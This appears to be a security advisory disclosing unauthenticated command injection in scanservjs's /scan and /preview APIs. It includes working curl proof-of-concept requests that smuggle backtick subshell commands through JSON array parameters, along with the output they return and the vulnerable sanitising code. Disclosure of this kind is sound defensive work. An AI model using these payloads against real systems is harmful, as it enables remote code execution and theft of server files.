Scanservjs has a RESTful API that provides endpoints for interacting with scanners using the SANE library. There are two APIs for scanning an image and generating a preview image that call out to Process.spawn, invoking a scanimage command as a subprocess of the server, and passing arguments from the API request body as arguments into the subprocess. Both APIs suffer from OS Command Injection via type confusion in several parameters in the POST body. While the business logic does sanitize string parameters from these API calls, it doesn't sufficiently prevent arrays of strings from being passed in several vulnerable POST body parameters. This allows an attacker to pass a JSON array with a single string parameter, buffeted by backticks, which gets formatted as a string and placed in the arguments for scanimage. This ultimately executes a subshell with an arbitrary command passed by the attacker, leading to remote code execution. While scanservjs has the option to enable HTTP Basic Auth, it is hidden in the config and there is no documentation on this feature, therefore this is a remote code execution without authentication by default.

**Proof of Concept****POST /scan Proof of Concept**

Request:

    curl --request POST \
      --url http://localhost:8080/scan \
      --header 'Content-Type: application/json' \
      --data '{"version":"2.26.1","params":{"deviceId":"pixma:MP620_10.64.0.25","resolution":["`cat /etc/os-release 1>&2`"],"width":216,"height":297,"left":0,"top":0,"mode":"Color","source":"Flatbed"},"filters":[],"pipeline":"JPG | @:pipeline.high-quality","batch":"none","index":1}'
    

Response:

    {
        "message": "/usr/bin/scanimage -d pixma:MP620_10.64.0.25 --source Flatbed --mode Color --resolution `cat /etc/os-release 1>&2` -l 0 -t 0 -x 216 -y 297 --format tiff -o data/temp/~tmp-scan-0-0001.tif exited with code: 1, stderr: PRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\nscanimage: open of device pixma:MP620_10.64.0.25 failed: Invalid argument\n",
        "code": -1
    }
    

**Proof of Concept****POST /preview Proof of Concept**

Request:

    curl --request POST \
      --url http://localhost:8080/preview \
      --header 'Content-Type: application/json' \
      --data '{"version":"2.26.1","params":{"deviceId":"pixma:MP620_10.64.0.25","resolution":100,"width":216,"height":297,"left":0,"top":0,"mode":"Color","source":"Flatbed", "contrast": ["`cat /etc/os-release 1>&2`"]},"filters":[],"pipeline":"JPG | @:pipeline.high-quality","batch":"none","index":1}'
    

Response:

    {
        "message": "/usr/bin/scanimage -d pixma:MP620_10.64.0.25 --source Flatbed --mode Color --resolution 100 -l 0 -t 0 -x 216 -y 297 --format tiff --contrast `cat /etc/os-release 1>&2` -o data/preview/preview.tif exited with code: 1, stderr: PRETTY_NAME=\"Ubuntu 22.10\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.10\"\nVERSION=\"22.10 (Kinetic Kudu)\"\nVERSION_CODENAME=kinetic\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=kinetic\nLOGO=ubuntu-logo\nscanimage: open of device pixma:MP620_10.64.0.25 failed: Invalid argument\n",
        "code": -1
    }
    

**Impact**

The vulnerability can execute any process on the server using a subshell, so the compromise of the system running scanservjs is almost complete. This vulnerability enables an attacker to dump the contents of any file on the server that the user, or the user's group, associated with the scanservjs process has permissions to read. Exfiltrating data can be done by using code execution in a subshell and redirecting output of a cat like command to stderr. An attacker can do more than query data using the subshell, and can run commands to write data to the server, and execute other processes outside the scope of scanservjs. In the default case, scanservjs is setup with a dedicated non root user so this user cannot read files, write files or execute commands as root. In the worst case, an administrator sets up scanservjs to run as a user with root permissions.

**Occurrences**

command-builder.js L18

The vulnerability occurs in the following code when the parameters passed from the API are formatted and sanitized. String parameters are sanitized and surrounded with single quotes but array type parameters, which can be passed to this function, are not sanitized or quoted. They are then formatted to a string when calling return `${value}`.

      /**
       * @param {string|number} [value]
       * @returns {string}
       */
      _format(value) {
        if (typeof value === 'string') {
          if (value.includes('\'')) {
            throw Error('Argument must not contain single quote "\'"');
          } else if (['$', ' ', '#', '\\', ';'].some(c => value.includes(c))) {
            return `'${value}'`;
          }
        }
        return `${value}`;
      }

Tag

#debian